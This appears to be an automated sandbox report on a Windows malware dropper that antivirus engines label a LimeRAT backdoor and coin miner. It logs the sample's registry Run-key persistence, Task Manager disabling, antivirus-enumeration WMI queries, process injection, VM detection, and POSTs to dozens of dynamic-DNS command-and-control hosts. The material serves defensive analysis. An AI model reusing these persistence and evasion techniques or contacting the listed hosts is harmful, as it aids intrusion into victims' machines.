reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW May 2, 2022, 8:57 a.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\Windows (x86)\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\Windows (x86)\WinRing0x64.sys desired_access: 983551 service_handle: 0x0000000000112310 error_control: 1 service_type: 1 service_manager_handle: 0x0000000000112160	1	1123088	0

A stratum cryptocurrency mining command was executed (1 event)

cmdline

wmic process where name='xmrig.exe' delete

Disables Windows' Task Manager (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

Executes one or more WMI queries (3 events)

wmi	select * from antivirusproduct
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk

Network communications indicative of possible code injection originated from the process explorer.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
WSASend May 2, 2022, 8:57 a.m.	buffer: ¿VÇa·ìùökÕi*,%`]»¶¼wÅìÛ x¾×IÐeÈôY7È[§6B_úà»'>À,À0Ì©Ì¨ÌªÀ+À/À$À(kÀ#À'gÀ À9À À3=<5/ÿ # 0. + -3&$ Ã°(ÓB õf7\|U_ÙËæàRî"ªLØË¤( socket: 588		0	0
WSASend May 2, 2022, 8:57 a.m.	buffer: Eº9qÂXeªs"ZÂ/§òh¤e&â/o.Qö&9êe}ª«¦ÑºNb6¤iðñ]Kéöp2V-mtQâpÚ ?d:eArÈrò,½^xOíZ;S`ßPªàdb\ì°]Ïê_×-ïåÈýðrËµjF!îAÄ]8;ÖYi¦_a`ÇM$<Ú¬Ak&¤Èç(>øÆNô¹\| iøºBÅ£TäÐ¹3ú?=äÛ~ë°ÕÌ¢à,Dª')na!¡ò¥Lq±âk½¾ÆE/2x«Gh5Thð lë:Þc1~jÊï"r~b)È®äbûfªþ6×j7OU°¡z0ÕõåìòÞëøí¨ß\|Åú]l!Õ ê0bÖîL~±\¹µzÙ¦ª=Ùëþî5®·ìÄò®Ëªæ¤ÎmÌ1¬jçK'1ÉùèÙ38mÃ©¿Áþ1J.¦wÆÄ'º¬¬YÛËd±+z9úUµ(ÛZ$ {9´g%H¯®¾Åõ) _©x;üV¨A ¹m@ÓÝ¾º×µê¡QÐþÕ¾ÝD°Ó(\®Ru».±ÝRGsY©TÝFyª^!¾õÞâ( ^ÚÇÛ >üDÜÒüL±?)XK2 Ëp[È©íÀj¶ré5ó+ûbßö½{KâlnN¦§æ¬ïÄ´5Ï¶*ìùÐX²Ó2ä·ÙUÕ=dn}6ØÐåÞâØ!CåcÄ¼5ÓmsfÆ<ºhÁù1x²û2ÝÃ¬#¥§ÉiöO9ãiA³6+JQ<«$rPnî Ï)ý socket: 588		0	0

wscript.exe-based dropper (JScript, VBS) (50 out of 67 events)

Network activity contains more than one unique useragent (2 events)

process	certutil.exe				useragent	CertUtil URL Agent
process	wscript.exe				useragent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 137 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.ddns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.ddnsking.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.3utilities.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.bounceme.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.freedynamicdns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.freedynamicdns.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
send May 2, 2022, 8:57 a.m.	buffer: ! socket: 996 sent: 1	1	1
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.gotdns.ch:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.hopto.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.myftp.biz:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.myftp.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.myvnc.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.onthewifi.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.redirectme.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servebeer.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveblog.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servecounterstrike.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveftp.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servegame.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servehttp.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servehalflife.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveirc.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveminecraft.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servemp3.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servequake.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servepics.com:16039/is-ready flags: 0	1	1

One or more non-whitelisted processes were created (8 events)

parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\helps.vbs
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
parent_process	wscript.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\updateW\1xcls.bat
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\z.vbs
parent_process	wscript.exe	martian_process	"C:\Windows (x86)\xcls.bat"
parent_process	wscript.exe	martian_process	C:\Windows (x86)\xcls.bat

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://54.254.238.33

Attempts to remove evidence of file being downloaded from the Internet (1 event)

file	C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (30 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2984 resumed a thread in remote process 3068
Process injection	Process 3068 resumed a thread in remote process 2608
Process injection	Process 3068 resumed a thread in remote process 2740
Process injection	Process 3068 resumed a thread in remote process 2976
Process injection	Process 3068 resumed a thread in remote process 2568
Process injection	Process 3068 resumed a thread in remote process 2860
Process injection	Process 3068 resumed a thread in remote process 2964
Process injection	Process 3068 resumed a thread in remote process 3576
Process injection	Process 3068 resumed a thread in remote process 3648
Process injection	Process 3068 resumed a thread in remote process 296
Process injection	Process 3896 resumed a thread in remote process 4008
Process injection	Process 4008 resumed a thread in remote process 3244
Process injection	Process 4008 resumed a thread in remote process 3892
Process injection	Process 2644 resumed a thread in remote process 3836
Process injection	Process 2644 resumed a thread in remote process 1968
NtResumeThread May 2, 2022, 8:56 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 3068	1	0	0
NtResumeThread May 2, 2022, 8:56 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2608	1	0	0
NtResumeThread May 2, 2022, 8:56 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2740	1	0	0
NtResumeThread May 2, 2022, 8:56 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2976	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x000000000000028c suspend_count: 1 process_identifier: 2568	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000298 suspend_count: 1 process_identifier: 2860	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000108 suspend_count: 0 process_identifier: 2964	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x000000000000023c suspend_count: 0 process_identifier: 3576	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000108 suspend_count: 0 process_identifier: 3648	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000298 suspend_count: 1 process_identifier: 296	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000204 suspend_count: 1 process_identifier: 4008	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 3244	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000200 suspend_count: 1 process_identifier: 3892	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 3836	1	0	0
NtResumeThread May 2, 2022, 8:57 a.m.	thread_handle: 0x0000000000000074 suspend_count: 0 process_identifier: 1968	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW May 2, 2022, 8:57 a.m.	thread_identifier: 2208 thread_handle: 0x0000000000000068 process_identifier: 3836 current_directory: filepath: C:\Windows (x86)\explorer.exe track: 1 command_line: "C:\Windows (x86)\explorer.exe" filepath_r: C:\Windows (x86)\explorer.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000074	1	1	0

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation May 2, 2022, 8:57 a.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

Bkav	W32.AIDetect.malware2
MicroWorld-eScan	Trojan.GenericKD.47423426
CAT-QuickHeal	Trojan.MsilFC.S19436131
ALYac	IL:Trojan.MSILZilla.7623
Cylance	Unsafe
Sangfor	Exploit.Win32.Certutil.tm
K7AntiVirus	Trojan ( 0056e5201 )
Alibaba	TrojanPSW:Win32/Stealer.e23b010f
K7GW	Trojan ( 0056e5201 )
Cybereason	malicious.19949e
Arcabit	Trojan.Generic.D2D39FC2
Cyren	VBS/Agent.ABA
Symantec	Trojan.Gen.6
Elastic	malicious (high confidence)
ESET-NOD32	multiple detections
APEX	Malicious
Kaspersky	Exploit.Win32.Certutil.tm
BitDefender	Trojan.GenericKD.47423426
NANO-Antivirus	Trojan.Script.Agent.fbgfaf
Avast	VBS:Dropper-UN [Trj]
Tencent	Win32.Trojan.Blocker.Wqcw
Emsisoft	Trojan.GenericKD.47423426 (B)
Comodo	Malware@#1sbof9vw77lzu
DrWeb	Trojan.Siggen10.39470
TrendMicro	Coinminer.MSIL.LIMERAT.SMA
McAfee-GW-Edition	BehavesLike.Win32.Backdoor.gc
FireEye	Generic.mg.d55af7419949eb16
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious SFX
Avira	TR/Crypt.XPACK.Gen7
Gridinsoft	Trojan.Win64.Downloader.oa!s1
Microsoft	Backdoor:Win32/LimeRat.YA!MTB
GData	Win64.Trojan.Agent.AWK8T5
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Disfa.C4407000
McAfee	Artemis!D55AF7419949
MAX	malware (ai score=87)
VBA32	Trojan.Downloader
Malwarebytes	Malware.AI.4186108609
TrendMicro-HouseCall	TROJ_GEN.R002H0CDU22
Rising	Backdoor.LimeRat!1.B863 (CLASSIC:bWQ1OiJM5M03mm8M)
Ikarus	Win32.Outbreak
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	VBS/Agent.AN!tr
BitDefenderTheta	Gen:NN.ZemsilF.34638.biW@ayUARzm
AVG	VBS:Dropper-UN [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)

dead_host	3.1.85.243:16039
dead_host	3.1.85.243:11069
dead_host	3.1.85.243:16020

IE.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All